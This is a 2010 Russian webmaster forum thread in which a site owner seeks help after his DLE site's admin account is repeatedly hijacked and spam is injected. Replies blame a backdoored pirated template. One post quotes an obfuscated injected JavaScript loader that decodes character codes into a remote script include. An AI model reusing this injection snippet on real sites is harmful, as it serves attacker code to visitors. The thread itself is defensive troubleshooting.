sanya pro 0 Опубликовано: 16 марта 2010 Рассказать Опубликовано: 16 марта 2010 Недавно обновился до 8.5 версии движка, сменил дизайн сайта, переделывал шаблон сайта сам. И после этих действий: Кто-то (или что-то) постоянно взламывает пароль администратора, меняет, редактирует профиль и пароль администратора, добавляют новости на сайт типа: "Наш новый сайт и там ссылка на сайт" вставляют рекламу, сегодня заметил что удалили комментарии и т.д. (уже 4-й день подряд, только восстановлю пароль, через некоторое время это приходится делать снова...) Как защитится от злоумышленников ...? Как выявить и устранить эту дыру? Может кто что-то посоветовать, подсказать, а то уже нет сил? Сайт grand-tv.com (лицензия) - пароль от фтп не храню (постоянно ввожу) Заранее спасибо! Цитата Ссылка на сообщение Поделиться на других сайтах
maclay 0 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 А мыло твое не ломали? Моет тоже восстанавливает на твое мыло?)) Цитата Ссылка на сообщение Поделиться на других сайтах
ArtemNY 17 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Недавно обновился до 8.5 версии движка, сменил дизайн сайта, переделывал шаблон сайта сам. И после этих действий: Кто-то (или что-то) постоянно взламывает пароль администратора, меняет, редактирует профиль и пароль администратора, добавляют новости на сайт типа: "Наш новый сайт и там ссылка на сайт" вставляют рекламу, сегодня заметил что удалили комментарии и т.д. (уже 4-й день подряд, только восстановлю пароль, через некоторое время это приходится делать снова...) Как защитится от злоумышленников ...? Как выявить и устранить эту дыру? Может кто что-то посоветовать, подсказать, а то уже нет сил? Сайт grand-tv.com (лицензия) - пароль от фтп не храню (постоянно ввожу) Заранее спасибо! Думаю если нет никаких левых модов и скриптов типа попандеров и прочей х-ни, то дело только в ыМейле... Цитата Ссылка на сообщение Поделиться на других сайтах
sanya pro 0 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 (изменено) Автор Думаю если нет никаких левых модов и скриптов типа попандеров и прочей х-ни, то дело только в ыМейле... Сменил мыло, и пароли: к фтп, почте, админпанели на долго ли..? По поводу модов, стоит карта сайта, модуль переходи, и pingationMod - все куплены у авторов! (модули стояли раньше) По поводу скриптов типа попандеров и прочей х-ни, заметил вчера влепили попандер, ну и от меня стоит блок бодиклика До обновления движка и смены шаблона все было хорошо! Думаю в шаблоне собака зарыта (в каком нибудь .js - в этом не разбираюсь, только сss и html) может обновить движок и сменить шаблон??? Изменено 17 марта 2010 пользователем sanya pro Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 До обновления движка и смены шаблона все было хорошо! сомнительный источник шаблона, прямой путь к взлому сайта, шаблон нужно однозначно убирать, заказывайте себе либо персональный, либо скачивайте из надежных источников. Времена когда можно было скачать нормальный рип или нулл уже давно прошли, сейчас в каждом нулле понатыканы бэкдоры, а в каждом рипе трояны и что еще хуже те же бекдоры. Например файл шаблона login.tpl, может перехватывать вводимый пароль и отсылать злоумышленникам. Цитата Ссылка на сообщение Поделиться на других сайтах
Mek 99 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 celsoft, есть ли какой онлайн сервис для проверки всего сайта целиком, или же отдельно файлов .php и .tpl на наличие вредоносного кода, троянов и бекдоров ? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Mek, мне такие неизвестны Цитата Ссылка на сообщение Поделиться на других сайтах
kpravda 102 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Mek у меня Kaspersky Internet Security палит все ифреймы, шеллы.. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Mek у меня Kaspersky Internet Security палит все ифреймы, шеллы.. Он полностью сканирует весь сайт? Цитата Ссылка на сообщение Поделиться на других сайтах
kpravda 102 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Делаю дамп файлов на комп и сканирую Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 iFrame может быть прописан в базу данных и выводиться в новостях. И ты базу данных тоже выкачиваешь и проверяешь так? Цитата Ссылка на сообщение Поделиться на других сайтах
sanya pro 0 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Автор До обновления движка и смены шаблона все было хорошо! сомнительный источник шаблона, прямой путь к взлому сайта, шаблон нужно однозначно убирать, заказывайте себе либо персональный, либо скачивайте из надежных источников. Времена когда можно было скачать нормальный рип или нулл уже давно прошли, сейчас в каждом нулле понатыканы бэкдоры, а в каждом рипе трояны и что еще хуже те же бекдоры. Например файл шаблона login.tpl, может перехватывать вводимый пароль и отсылать злоумышленникам. Спасибо за отклик. Буду менять шаблон или закажу новый (на 90% уверен, что дело в шаблоне) Цитата Ссылка на сообщение Поделиться на других сайтах
sanya pro 0 Опубликовано: 18 марта 2010 Рассказать Опубликовано: 18 марта 2010 Автор Вот заметил такой код вылазит перед <head>, в каком же файле его искать (чтобы снести), может он и есть причиной взлома паролей??? <script type="text/javascript" language="javascript"> <!-- function tdy794(jD103){document.write( String.fromCharCode(parseInt(jD103)-5));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var A682="109D121D121D117D63D52D52D103D113D102D122D"+ "127D127D106D119D51D116D112D116D120D109D106D104D109D"+ "112D102D51D115D106D121D52D120D52D104D119D127D118D58D"+ "54D58D57D52D68D120D110D105D66D54D53D54D62D53D61";var RP795=A682.split("D"); for(go690=0;go690<RP795.length;go690++){tdy794(RP795[go690]);} document.write("'></sc"+"ript>"); // --> </script> заранее спасибо, за понимание! Цитата Ссылка на сообщение Поделиться на других сайтах
kpravda 102 Опубликовано: 18 марта 2010 Рассказать Опубликовано: 18 марта 2010 index.php /templates/название шаблона/main.tpl init.php Цитата Ссылка на сообщение Поделиться на других сайтах
sanya pro 0 Опубликовано: 18 марта 2010 Рассказать Опубликовано: 18 марта 2010 Автор В этих файлах нет кода: index.php init.php Но он появляется в main.tpl , через определенный промежуток времени даже когда я его удаляю. ну прям чудеса... такое впечатление, что есть скрытый админ и он постоянно редактирует мой профиль, то почту меняет то логин, пароль само собой, восстанавливать свои данные приходится через phpmyadmin, но это не на долго... Цитата Ссылка на сообщение Поделиться на других сайтах
Nektov 59 Опубликовано: 19 марта 2010 Рассказать Опубликовано: 19 марта 2010 Посмотрите логи сервера. Там толжно быть прописано что их (строки скрипта) повторно вставляет. Для проверки файлов шаблона и сайта советую http://www.virustotal.com/ru/ Весь сайт можно проверить здесь: http://safeweb.norton.com/report/show?url=site.ru http://www.siteadvisor.com/sites/site.ru Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 19 марта 2010 Рассказать Опубликовано: 19 марта 2010 Nektov, спасибо за ссылки, полезные фичи для вебмастера Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.